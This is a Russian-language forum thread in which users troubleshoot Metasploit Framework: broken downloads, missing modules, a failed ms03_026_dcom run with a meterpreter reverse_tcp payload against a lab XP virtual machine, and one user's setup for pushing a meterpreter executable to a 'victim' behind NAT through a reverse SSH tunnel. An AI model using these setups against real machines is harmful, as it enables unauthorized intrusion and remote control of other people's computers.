Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Это в гостевых ОС или в основной?
    P.S. Я вот тоже третий раз качаю прошивку в архиве и снова битый архив... :(
     
    #381 -=lebed=-, 20 Mar 2012
    Last edited: 20 Mar 2012
  2. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    -=lebed=-
    Везде под админом
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    если под виртуалкой то же самое, скорее всего битый дистрибутив, качай ещё раз. Пишет же либо не полный дистриб, либо повреждённый.
     
    #383 -=lebed=-, 20 Mar 2012
    Last edited: 20 Mar 2012
  4. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    Уже раз 100 перескачивал. То же самое.
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    антвирь есть? может он что-то режет при закачке, отключи нафиг...
    Может у прова траф проверяется и тоже срезает... там же куча сплоитов и т.д. = вирусный траф как бэ...
     
  6. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    Антивиря нет, инет мегафон модем.
     
  7. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Попробуй скачать с другого провайдера, может пров режет вирусный траф, больше не вижу вариантов (кроме как 3G-интернет - УГ).
     
  8. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    Все получилось, решилось так... Скачал с виртуалки и все ок. Кстати можно твою аську -=lebed=- хочу пару вопросов задать. Если тебе не сложно.
     
  9. Crazy Script

    Crazy Script New Member

    Joined:
    15 Jun 2011
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Поставил на вирт. машину Win XP SP2, и пытаюсь залить на неё через Metasploit эксплоит ms03_026_dcom с начинкой windows/meterpreter/reverse_tcp.

    Прописываю удаленный хост/порт, и локальный. В итоге выдает:

    Started reverse handler on 172.16.0.12:4444
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.0.15[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.0.15[135] ...
    [*] Sending exploit ...
    [*] Exploit completed, but no session was created.

    Никак сессию открывать не хочет:( Обе машины взаимно пингуются, в одной сети, IP присваиваются роутером. Подскажите, в чем косяк может быть?

    Спасибо заранее!
     
  10. fizzzer

    fizzzer New Member

    Joined:
    24 Feb 2012
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Просто эксплоит работает на:

    Microsoft Windows XP Professional SP1
    Microsoft Windows XP Professional
    Microsoft Windows XP Home SP1
    Microsoft Windows XP Home
    Microsoft Windows XP 64-bit Edition SP1
    Microsoft Windows XP 64-bit Edition
    ...

    на Вашей системе скорее всего имеется патч (имею ввиду SP2)
     
  11. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Угу, похоже XP Sp2 сплоитом не пробивается, поэтому и нет сессии в итоге.
     
  12. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    Подскажите актуальный ман на сегодняшний день по Меиасплоиту.
     
  13. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    man metasploit
    В консоли.
     
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    чем не устраивает ЭТО ?
     
  15. Mr.Wekly

    Mr.Wekly New Member

    Joined:
    15 Sep 2011
    Messages:
    60
    Likes Received:
    3
    Reputations:
    5
    пишет
     
  16. smaga38

    smaga38 New Member

    Joined:
    3 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подскажите если я выхожу в интернет с usb модема как правильно задать LHOST?
     
  17. smaga38

    smaga38 New Member

    Joined:
    3 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    если я выхожу в инет через 3G-модем, чтобы подгрузитть meterpreter/reverse возможно ли использовать ssh туннель через сервер с белым IP или веб-шелл?
     
  18. smaga38

    smaga38 New Member

    Joined:
    3 Dec 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем привет! Продолжаю свои вопросы ) дело обстоит следующим образом: есть сервер с прямым IP, есть домашняя машина с 3G модемом. И жертва за NAT-ом. На домашней машине пробрасываю обратный ssh-туннель до сервера, запускаю multi/handler и закидываю жертве exe с windows/meterpreter/reverce_tcp, который стучится на проброшенный порт сервера. на домашней машине открывается сессия, но любая команда приводит вот к этому:"Session manipulation failed: Validation failed: Address is reserved". Подскажите что я делаю не так
     
  19. Brooklyn111

    Brooklyn111 New Member

    Joined:
    13 Feb 2011
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
    ось ХР, установил Metasploit Pro, таже консоль как на frameworke, но кроме хелпа, подключения к базе, и show, другие команды не работает, почему?
     
    #399 Brooklyn111, 1 Sep 2012
    Last edited: 2 Sep 2012
  20. DonaldDuck

    DonaldDuck New Member

    Joined:
    29 Apr 2012
    Messages:
    110
    Likes Received:
    3
    Reputations:
    1
    Установил Metasploit Pro c оф.сайта.
    Набираю в консоли:
    Code:
    msf-pro > use exploit/windows/browser/ie_cbutton_uaf
    [-] Failed to load module: exploit/windows/browser/ie_cbutton_uaf
    В чем дело?

    [update]
    Разобрался.


    Еще вопрос: почему в свежескачанном метасплойте нет уязвимости ИЕ от 27 декабря прошлого года? Где ее взять для метасплойта?

    [update-2]
    Разобрался =)

    Кто где берет виртуальные ОСи для тестов? Неужели сами ставите? ))
     
    #400 DonaldDuck, 5 Jan 2013
    Last edited: 6 Jan 2013